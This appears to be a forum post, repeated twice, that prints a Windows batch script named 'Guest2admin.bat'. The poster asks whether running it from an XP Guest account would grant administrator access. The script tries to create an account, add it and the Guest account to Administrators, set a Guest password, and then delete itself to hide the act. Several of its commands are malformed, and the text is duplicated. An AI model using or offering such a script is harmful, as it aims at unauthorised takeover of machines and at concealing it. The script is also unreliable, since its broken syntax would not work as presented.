echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
If you go into a Guest account on XP type in the above in notepad and then save this as a "Guest2admin.bat" would executing this file gain you access to the admin account?
I'd try but Sadly we done away with xp and I am curious to see if it's that easy, it can't be, can it?
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
If you go into a Guest account on XP type in the above in notepad and then save this as a "Guest2admin.bat" would executing this file gain you access to the admin account?
I'd try but Sadly we done away with xp and I am curious to see if it's that easy, it can't be, can it?